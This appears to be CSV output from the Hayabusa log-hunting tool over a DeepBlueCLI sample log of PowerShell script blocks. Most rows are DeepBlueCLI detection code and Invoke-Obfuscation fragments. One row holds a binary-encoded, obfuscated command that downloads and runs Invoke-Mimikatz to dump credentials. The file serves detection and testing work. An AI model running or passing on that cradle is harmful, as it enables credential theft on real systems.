# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:25:40.275 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" 
{$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:27:04.659 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:27:04.659 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:27:04.660 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:27:04.661 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:27:09.364 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:52.559 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:52.574 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input 
$RandomDelimiters))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:53.960 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:53.968 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:53.973 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:53.976 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:53.978 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:53.981 
+09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:53.991 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:54.000 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:54.036 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:54.050 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ # Encapsulate current item with single quote if it contains a non-integer. 
If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:56.644 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:56.651 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:56.696 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:56:09.115 +09:00,SEC511,4104,info,,PwSh Scriptblock 
Log,"-join('1001001n1000101-1011000g100000<101000e1001110F1100101-1110111@101101<1001111i1100010i1101010n1100101n1100011e1110100@100000-1001110n1100101n1110100n101110e1010111n1100101;1100010<1000011F1101100{1101001-1100101-1101110-1110100i101001<101110-1000100-1101111<1110111F1101110;1101100n1101111i1100001e1100100{1010011;1110100<1110010@1101001i1101110i1100111{101000e100111e1101000@1110100e1110100g1110000g1110011-111010-101111;101111;1110010@1100001@1110111-101110;1100111{1101001F1110100-1101000@1110101{1100010e1110101n1110011@1100101i1110010-1100011i1101111n1101110e1110100i1100101;1101110@1110100n101110i1100011<1101111n1101101-101111n1101101@1100001<1110100i1110100-1101001{1100110;1100101i1110011-1110100F1100001n1110100{1101001@1101111F1101110e101111-1010000<1101111e1110111{1100101e1110010;1010011i1110000n1101100@1101111F1101001e1110100i101111n1101101-1100001;1110011<1110100i1100101<1110010i101111<1000101;1111000;1100110-1101001-1101100<1110100;1110010F1100001<1110100{1101001@1101111n1101110i101111g1001001e1101110<1110110{1101111F1101011n1100101{101101@1001101-1101001{1101101i1101001n1101011n1100001-1110100;1111010<101110-1110000e1110011g110001e100111-101001;111011F100000@1001001{1101110g1110110{1101111i1101011F1100101-101101n1001101g1101001e1101101@1101001-1101011{1100001-1110100{1111010@100000g101101;1000100-1110101g1101101g1110000F1000011g1110010n1100101;1100100<1110011'.splIT( '<{genF-i;@' )| FOreAcH { ([coNvErt]::toInT16(([StriNG]$_) ,2 ) -AS [CHAR]) })| &( ([STRinG]$VerBosEPREfereNce)[1,3]+'x'-jOiN'')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:56:09.116 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ ([coNvErt]::toInT16(([StriNG]$_) ,2 ) -AS [CHAR]) 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:56:33.244 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:56:34.464 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:56:34.470 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:56:34.470 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx 